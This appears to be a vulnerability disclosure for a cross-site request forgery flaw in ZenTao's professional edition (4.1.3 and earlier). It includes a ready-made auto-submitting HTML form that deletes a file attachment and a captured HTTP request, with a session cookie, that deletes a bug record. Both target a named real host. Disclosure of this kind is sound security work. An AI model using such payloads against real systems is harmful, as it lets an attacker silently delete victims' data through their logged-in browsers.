Discoverer:hh
Product official website:https://www.zentao.net/
The zentao Enterprise Edition has expanded horizontally based on the project management process on the basis of the open source version, adding functions such as operation and maintenance management, feedback management, and OA office management to meet the online collaboration needs of more roles, forming a closed-loop management system. The Enterprise Edition is more adaptable to the personalized needs of enterprises, adding functions such as custom workflows, custom large screens, custom pivot tables, custom charts, and AI prompt designers, providing more comprehensive support for enterprise project management. In terms of service, the Enterprise Edition can provide one-on-one customer successful services such as user training, technical support, and review guidance to ensure the implementation of the system.
zentao_biz(professional edition) ≤ 4.1.3 does not verify Referer,No token used,so everywhere in zentao can be attacked by csrf
I used black box testing to identify this vulnerability,Below, I will give two examples
If the victim has administrator privileges, he can delete attachments in the document attachment library.
When the victim logged into Zentao and opened our malicious website in the same browser,attachment 66825 will be deleted.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="<https://plm.infosec.com.cn/index.php>">
<input type="hidden" name="m" value="file" />
<input type="hidden" name="f" value="delete" />
<input type="hidden" name="fileID" value="66825" />
<input type="hidden" name="confirm" value="yes" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
If the victim has normal privileges,victim can delete the bug which he created
This is a bug removal request I caught in Burpsuite,I replace Referer: https://plm.infosec.com.cn/index.php?m=bug&f=delete&bugID=39589 with Referer: https://aaa,found that bugs can still be removed,this is why i say zentao does not verify Referer
GET /index.php?m=bug&f=delete&bugID=39589&confirm=yes HTTP/1.1
Host: [plm.infosec.com.cn](<http://plm.infosec.com.cn/>)
Cookie: lang=zh-cn; device=desktop; theme=default; feedbackView=0; lastProduct=295; lastProject=2879; lastTaskModule=0; preProjectID=2879; preBranch=0; lastBugModule=0; preProductID=295; ajax_lastNext=on; pagerMyBug=50; pagerProductAll=200; windowWidth=1920; windowHeight=919; zentaosid=46giq8gdod0d8k4t1sbg1b48rh; from=doc; docFilesViewType=list; bugModule=0; bugBranch=0; treeBranch=0; qaBugOrder=id_desc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: [<https://plm.infosec.com.cn/index.php?m=bug&f=delete&bugID=39589>](<https://plm.infosec.com.cn/index.php?m=bug&f=delete&bugID=39589>)
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
When the victim logged into Zentao and opened our malicious website in the same browser,bug 39590 will be deleted.